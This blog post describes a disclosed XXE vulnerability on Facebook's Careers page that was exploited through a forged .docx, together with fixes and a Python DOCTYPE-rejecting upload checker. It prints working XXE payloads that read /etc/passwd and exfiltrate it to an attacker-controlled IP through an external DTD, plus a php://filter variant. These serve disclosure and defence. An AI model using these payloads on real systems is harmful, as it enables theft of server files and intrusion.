How I Hacked Facebook with a Word Document

An XML External Entity (XXE) vulnerability was found on the Facebook Careers page by Mohamed Ramadan.

The OWASP XXE Definition reads:

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts.

In this case a forged .docx (which is in fact XML) including a custom DTD was uploaded. That DTD pointed towards a URL under the hacker's control:

1. Uploaded XML:

<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.xxx.xxx.90/ext.dtd">
%dtd;
%send;
]]>

2. The ext.dtd file (on a server you control):

<!ENTITY % all
"<!ENTITY % &#x25; send SYSTEM 'http://197.xxx.xxx.90/FACEBOOK-HACKED?%file;'>"
>
%all;

As the contents of ext.dtd are processed on the server which received the payload, a request to http://197.xxx.xxx.90/FACEBOOK-HACKED… along with the contents of the file entity (!!) attached to it will be made by the server.

How I Hacked Facebook with a Word Document →

Note: To fix this in PHP call libxml_disable_entity_loader(true); in your code. If you don’t, XML files like this one can do nasty stuff (yes, that reads in /etc/passwd and shows it onscreen):

<!DOCTYPE test [ <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> ]>
<xxx>&xxeattack;</xxx>

A somewhat altered version is this one, which uses PHP's php://filter stream wrapper. The result is a single base64-encoded string which you can attach as a querystring parameter to a URL:

<!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
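
Besides hardening the parser, an upload handler can refuse any .docx whose XML parts declare a DOCTYPE before the real parser ever sees them. The following is an added example, not code from the original write-up or from Facebook; the function names, the sample documents and the assumption that legitimate uploads never carry a DTD are mine.

```python
import io
import zipfile
import xml.parsers.expat

# Constructed samples: a clean part and one carrying a DTD like the forged upload.
CLEAN = b'<?xml version="1.0"?><document><body/></document>'
FORGED = (b'<?xml version="1.0"?>\n<!DOCTYPE root [\n'
          b'<!ENTITY % dtd SYSTEM "http://example.invalid/ext.dtd">\n%dtd;\n]>\n<document/>')


class DoctypeFound(Exception):
    """Raised from the expat callback to stop parsing at the DOCTYPE."""


def _on_doctype(name, sysid, pubid, has_internal_subset):
    raise DoctypeFound(name)


def classify_part(xml_bytes):
    """Return 'doctype', 'malformed' or None for one XML part."""
    parser = xml.parsers.expat.ParserCreate()
    # expat fires this before it reads any entity declaration, and pyexpat
    # fetches nothing external unless an ExternalEntityRefHandler is set.
    parser.StartDoctypeDeclHandler = _on_doctype
    try:
        parser.Parse(xml_bytes, True)
    except DoctypeFound:
        return "doctype"
    except xml.parsers.expat.ExpatError:
        return "malformed"
    return None


def find_suspect_parts(docx_bytes):
    """List (part name, reason) for every XML part that should block the upload."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for info in archive.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            reason = classify_part(archive.read(info))
            if reason:
                findings.append((info.filename, reason))
    return findings


def build_docx(document_xml):
    """Constructed sample: a minimal package with just two parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("[Content_Types].xml", b'<?xml version="1.0"?><Types/>')
        archive.writestr("word/document.xml", document_xml)
    return buf.getvalue()
```

An empty list from `find_suspect_parts` means no part declared a DTD; anything else is a reason to reject the file and log the part name.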

Published by Bramus!
